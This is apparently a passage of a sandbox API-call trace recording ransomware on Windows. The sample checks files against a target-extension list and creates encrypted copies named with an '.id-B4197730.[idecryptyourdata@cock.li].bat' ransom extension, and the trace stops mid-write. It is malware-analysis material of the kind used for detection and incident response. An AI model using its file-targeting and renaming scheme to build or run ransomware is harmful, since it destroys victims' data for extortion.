[0179.245] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppvIsvSubsystems64.dll") returned 81 [0179.245] lstrlenW (lpString=".jpg") returned 4 [0179.245] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.245] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.245] lstrlenW (lpString="AppVIsvVirtualization.dll") returned 25 [0179.245] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0179.246] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=567512) returned 1 [0179.246] CloseHandle (hObject=0x358) returned 1 [0179.246] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll")) returned 0x20 [0179.246] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.246] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvisvvirtualization.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0179.246] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0179.246] lstrlenW (lpString=".doc") returned 4 [0179.246] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.246] lstrlenW (lpString=".docx") returned 5 [0179.246] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0179.246] lstrlenW (lpString=".pdf") returned 4 [0179.246] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.246] lstrlenW (lpString=".xls") returned 4 [0179.246] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.246] lstrlenW (lpString=".xlsx") returned 5 [0179.246] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0179.246] lstrlenW (lpString=".ppt") returned 4 [0179.246] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0179.247] lstrlenW (lpString=".zip") returned 4 [0179.247] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.247] lstrlenW (lpString=".rar") returned 4 [0179.247] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.247] lstrlenW (lpString=".bz2") returned 4 [0179.247] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.247] lstrlenW (lpString=".7z") returned 3 [0179.247] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0179.247] lstrlenW (lpString=".dbf") returned 4 [0179.247] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0179.247] lstrlenW (lpString=".1cd") returned 4 [0179.247] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0179.247] lstrlenW (lpString=".jpg") returned 4 [0179.247] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0179.247] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0179.247] lstrlenW (lpString=".doc") returned 4 [0179.247] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.247] lstrlenW (lpString=".docx") returned 5 [0179.247] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0179.247] lstrlenW (lpString=".pdf") returned 4 [0179.247] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.247] lstrlenW (lpString=".xls") returned 4 [0179.247] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.248] lstrlenW (lpString=".xlsx") returned 5 [0179.248] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0179.248] lstrlenW (lpString=".ppt") returned 4 [0179.248] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0179.248] lstrlenW (lpString=".zip") returned 4 [0179.248] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.248] lstrlenW (lpString=".rar") returned 4 [0179.248] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.248] lstrlenW (lpString=".bz2") returned 4 [0179.248] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.248] lstrlenW (lpString=".7z") returned 3 [0179.248] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0179.248] lstrlenW (lpString=".dbf") returned 4 [0179.248] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0179.248] lstrlenW (lpString=".1cd") returned 4 [0179.248] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.248] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVIsvVirtualization.dll") returned 83 [0179.248] lstrlenW (lpString=".jpg") returned 4 [0179.248] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.248] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.248] lstrlenW (lpString="AppVManifest.dll") returned 16 [0179.249] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0179.249] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=1231576) returned 1 [0179.249] CloseHandle (hObject=0x358) returned 1 [0179.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll")) returned 0x20 [0179.249] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.249] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvmanifest.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 74 [0179.249] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 74 [0179.250] lstrlenW (lpString=".doc") returned 4 [0179.250] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.250] lstrlenW (lpString=".docx") returned 5 [0179.250] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0179.250] lstrlenW (lpString=".pdf") returned 4 [0179.250] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.250] lstrlenW (lpString=".xls") returned 4 [0179.250] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.250] lstrlenW (lpString=".xlsx") returned 5 [0179.250] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0179.250] lstrlenW (lpString=".ppt") returned 4 [0179.250] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 74 [0179.250] lstrlenW (lpString=".zip") returned 4 [0179.250] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.250] lstrlenW (lpString=".rar") returned 4 [0179.250] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.250] lstrlenW (lpString=".bz2") returned 4 [0179.250] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.250] lstrlenW (lpString=".7z") returned 3 [0179.250] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 74 [0179.250] lstrlenW (lpString=".dbf") returned 4 [0179.250] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 74 [0179.250] lstrlenW (lpString=".1cd") returned 4 [0179.250] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.250] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 74 [0179.250] lstrlenW (lpString=".jpg") returned 4 [0179.250] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 74 [0179.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 74 [0179.251] lstrlenW (lpString=".doc") returned 4 [0179.251] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.251] lstrlenW (lpString=".docx") returned 5 [0179.251] lstrcmpiW (lpString1=".docx", lpString2="t.dll") returned -1 [0179.251] lstrlenW (lpString=".pdf") returned 4 [0179.251] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.251] lstrlenW (lpString=".xls") returned 4 [0179.251] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.251] lstrlenW (lpString=".xlsx") returned 5 [0179.251] lstrcmpiW (lpString1=".xlsx", lpString2="t.dll") returned -1 [0179.251] lstrlenW (lpString=".ppt") returned 4 [0179.251] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 74 [0179.251] lstrlenW (lpString=".zip") returned 4 [0179.251] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.251] lstrlenW (lpString=".rar") returned 4 [0179.251] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.251] lstrlenW (lpString=".bz2") returned 4 [0179.251] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.251] lstrlenW (lpString=".7z") returned 3 [0179.251] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 74 [0179.251] lstrlenW (lpString=".dbf") returned 4 [0179.251] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.251] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 74 [0179.251] lstrlenW (lpString=".1cd") returned 4 [0179.252] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.252] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVManifest.dll") returned 74 [0179.252] lstrlenW (lpString=".jpg") returned 4 [0179.252] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.252] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.252] lstrlenW (lpString="AppVOrchestration.dll") returned 21 [0179.252] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0179.253] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=947928) returned 1 [0179.253] CloseHandle (hObject=0x358) returned 1 [0179.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll")) returned 0x20 [0179.253] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.253] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvorchestration.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 79 [0179.253] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 79 [0179.253] lstrlenW (lpString=".doc") returned 4 [0179.253] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.253] lstrlenW (lpString=".docx") returned 5 [0179.253] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0179.253] lstrlenW (lpString=".pdf") returned 4 [0179.253] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.253] lstrlenW (lpString=".xls") returned 4 [0179.253] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.253] lstrlenW (lpString=".xlsx") returned 5 [0179.254] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0179.254] lstrlenW (lpString=".ppt") returned 4 [0179.254] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 79 [0179.254] lstrlenW (lpString=".zip") returned 4 [0179.254] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.254] lstrlenW (lpString=".rar") returned 4 [0179.254] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.254] lstrlenW (lpString=".bz2") returned 4 [0179.254] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.254] lstrlenW (lpString=".7z") returned 3 [0179.254] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 79 [0179.254] lstrlenW (lpString=".dbf") returned 4 [0179.254] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 79 [0179.254] lstrlenW (lpString=".1cd") returned 4 [0179.254] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 79 [0179.254] lstrlenW (lpString=".jpg") returned 4 [0179.254] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 79 [0179.254] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 79 [0179.254] lstrlenW (lpString=".doc") returned 4 [0179.254] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.254] lstrlenW (lpString=".docx") returned 5 [0179.254] lstrcmpiW (lpString1=".docx", lpString2="n.dll") returned -1 [0179.254] lstrlenW (lpString=".pdf") returned 4 [0179.255] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.255] lstrlenW (lpString=".xls") returned 4 [0179.255] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.255] lstrlenW (lpString=".xlsx") returned 5 [0179.255] lstrcmpiW (lpString1=".xlsx", lpString2="n.dll") returned -1 [0179.255] lstrlenW (lpString=".ppt") returned 4 [0179.255] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 79 [0179.255] lstrlenW (lpString=".zip") returned 4 [0179.255] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.255] lstrlenW (lpString=".rar") returned 4 [0179.255] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.255] lstrlenW (lpString=".bz2") returned 4 [0179.255] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.255] lstrlenW (lpString=".7z") returned 3 [0179.255] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 79 [0179.255] lstrlenW (lpString=".dbf") returned 4 [0179.255] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 79 [0179.255] lstrlenW (lpString=".1cd") returned 4 [0179.255] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.255] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVOrchestration.dll") returned 79 [0179.255] lstrlenW (lpString=".jpg") returned 4 [0179.255] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.255] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.256] lstrlenW (lpString="AppVPolicy.dll") returned 14 [0179.256] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0179.256] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=1295576) returned 1 [0179.256] CloseHandle (hObject=0x358) returned 1 [0179.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll")) returned 0x20 [0179.256] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.256] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvpolicy.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0179.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 72 [0179.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 72 [0179.257] lstrlenW (lpString=".doc") returned 4 [0179.257] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.257] lstrlenW (lpString=".docx") returned 5 [0179.257] lstrcmpiW (lpString1=".docx", lpString2="y.dll") returned -1 [0179.257] lstrlenW (lpString=".pdf") returned 4 [0179.257] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.257] lstrlenW (lpString=".xls") returned 4 [0179.257] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.257] lstrlenW (lpString=".xlsx") returned 5 [0179.257] lstrcmpiW (lpString1=".xlsx", lpString2="y.dll") returned -1 [0179.257] lstrlenW (lpString=".ppt") returned 4 [0179.257] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 72 [0179.257] lstrlenW (lpString=".zip") returned 4 [0179.257] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.257] lstrlenW (lpString=".rar") returned 4 [0179.257] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.257] lstrlenW (lpString=".bz2") returned 4 [0179.257] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.257] lstrlenW (lpString=".7z") returned 3 [0179.257] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 72 [0179.257] lstrlenW (lpString=".dbf") returned 4 [0179.257] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.257] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 72 [0179.257] lstrlenW (lpString=".1cd") returned 4 [0179.257] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 72 [0179.258] lstrlenW (lpString=".jpg") returned 4 [0179.258] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 72 [0179.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 72 [0179.258] lstrlenW (lpString=".doc") returned 4 [0179.258] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0179.258] lstrlenW (lpString=".docx") returned 5 [0179.258] lstrcmpiW (lpString1=".docx", lpString2="y.dll") returned -1 [0179.258] lstrlenW (lpString=".pdf") returned 4 [0179.258] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0179.258] lstrlenW (lpString=".xls") returned 4 [0179.258] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0179.258] lstrlenW (lpString=".xlsx") returned 5 [0179.258] lstrcmpiW (lpString1=".xlsx", lpString2="y.dll") returned -1 [0179.258] lstrlenW (lpString=".ppt") returned 4 [0179.258] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0179.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 72 [0179.258] lstrlenW (lpString=".zip") returned 4 [0179.258] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0179.258] lstrlenW (lpString=".rar") returned 4 [0179.258] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0179.258] lstrlenW (lpString=".bz2") returned 4 [0179.258] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0179.258] lstrlenW (lpString=".7z") returned 3 [0179.258] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0179.258] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 72 [0179.258] lstrlenW (lpString=".dbf") returned 4 [0179.258] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0179.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 72 [0179.259] lstrlenW (lpString=".1cd") returned 4 [0179.259] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0179.259] lstrlenW (lpString="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVPolicy.dll") returned 72 [0179.259] lstrlenW (lpString=".jpg") returned 4 [0179.259] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0179.259] lstrcmpiW (lpString1=".dll", lpString2=".bat") returned 1 [0179.259] lstrlenW (lpString="AppVScripting.dll") returned 17 [0179.259] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0179.259] GetFileSizeEx (in: hFile=0x358, lpFileSize=0x389ff14 | out: lpFileSize=0x389ff14*=512216) returned 1 [0179.260] CloseHandle (hObject=0x358) returned 1 [0179.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll")) returned 0x20 [0179.260] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll.id-b4197730.[idecryptyourdata@cock.li].bat")) returned 0xffffffff [0179.260] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x358 [0179.260] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.260] SetFilePointerEx (in: hFile=0x358, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x389fec0 | out: lpNewFilePointer=0x0) returned 1 [0179.260] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ClickToRun\\AppVScripting.dll.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\common files\\microsoft shared\\clicktorun\\appvscripting.dll.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x35c [0179.261] GetLastError () returned 0x0 [0179.261] ReadFile (in: hFile=0x358, lpBuffer=0x426c020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x389fecc, lpOverlapped=0x0 | out: lpBuffer=0x426c020*, lpNumberOfBytesRead=0x389fecc*=0x7d0d8, lpOverlapped=0x0) returned 1 [0181.199] WriteFile (in: hFile=0x35c, lpBuffer=0x426c020*, 